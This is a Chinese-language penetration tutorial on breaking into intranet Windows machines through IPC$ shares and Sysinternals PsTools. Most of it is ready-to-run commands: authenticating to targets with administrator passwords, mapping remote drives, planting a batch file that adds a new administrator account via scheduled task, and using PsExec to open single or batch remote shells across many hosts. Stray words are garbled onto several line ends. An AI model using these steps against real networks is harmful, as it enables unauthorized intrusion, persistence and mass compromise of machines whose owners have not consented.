內網IPC$入侵加pstools之遠程控制

前言:

IPC$(Internet process connection)是指內網裏面的文件共享鏈接,一般不少機子的默認共享都是打開的,在cmd下使用命令net share可查看本身的IPC$是否打開。html

PsTools是Sysinternals Suite中一款排名靠前的一個安全管理工具套件。如今被微軟收購。目前pstools中含有12款各式各樣的小工具。若是將它們靈活的運用,將會在滲透中收到奇效。全部的pstool第一次運行時都會彈框。能夠用–accepteula這個參數繞過。python

pstools可批量遠程操做windows服務器,還有全部的pstool都支持IPC$,一旦IPC$共享是鏈接的就不用輸入-u 和-p這兩個參數。shell

IPC$共享鏈接

在內網對已知用戶密碼的主機創建IPC$鏈接,命令以下:windows

Net use \\目標ip\IPC$ "密碼" /user:"用戶"

若是目標內網機是xp的系統,那麼能夠不用用戶和密碼便可創建IPC鏈接,且攻擊機的系統不能是win10及以上安全

例如:服務器

net use \\192.168.1.121\IPC$ "123456" /user:"administrator"

創建後全部的ps工具都將能夠不用輸入用戶和密碼了。工具

創建鏈接以後能夠進行磁盤映射ui

net use Z: \\192.168.1.121\c$
將目標機的C盤映射到本機的新建Z盤

用IPC$添加用戶的操做:spa

net user test 123456 /add
net localgroup administrators test /add
將上訴兩條命令保存位adduser.bat文件,而後在本機上執行(已創建鏈接)
copy adduser.bat \\192.168.1.121\c$
net time \\192.168.1.121
at \\192.168.1.121 執行時間 c:\adduser.bat
刪除當前鏈接,用新的用戶創建IPC$鏈接
net use \\192.168.1.121\ipcc$ /del

開啓23端口可用telnet登陸。命令行

pstools工具使用

須要目標主機開啓admin$共享且必須在一個內網才能使用,pstools包含一套工具

其中12款工具簡介以下:

PsExec - 遠程執行進程
PsFile - 顯示遠程打開的文件
PsGetSid - 顯示計算機或用戶的 SID
PsInfo - 列出有關係統的信息
PsKill - 按名稱或進程 ID 終止進程
PsList - 列出有關進程的詳細信息
PsLoggedOn - 查看在本地經過資源共享(包含全部資源)登陸的用戶
PsLogList - 轉儲事件日誌記錄
PsPasswd - 更改賬戶密碼
PsService - 查看和控制服務
PsShutdown - 關閉並從新啓動(可選)計算機
PsSuspend - 暫停進程

psexec介紹

ps利用最大的就是他了,他能夠配合ipc使用。

獲取目標機的shell命令結構爲:

psexec \\目標ip -u 用戶名 -p 密碼 進程名
psexec \\192.168.1.121 –u administrator –p 123456 cmd.exe

若是ipc已創建鏈接,那麼能夠不用輸入用戶密碼,直接 psexec \\192.168.1.121\ cmd.exe就行了,exit退出shell。

批量運行psexec鏈接cmd,這個方法適合用於內網存在大量xp系統,先將這些ip保存在一個記事本里面,而後按順序寫好一系列cmd命令放入bat文件中,而後命令行輸入:

PsExec @D:\PSTools\ip.txt -c D:\PSTools\20150415.bat cmd.exe

便可返回批量shell。

若是想要遠程機器執行本地c:\srm.exe文件能夠打:

psexec \\遠程機器ip -u administrator -p 123 -c c:\srm.exe

 

本片文章只講了IPC$和pstools裏面的psexec的配合使用,其餘pstools工具的使用請參照如下連接:

參考連接:http://www.javashuo.com/article/p-zpxtpmcg-dn.html

相關文章
相關標籤/搜索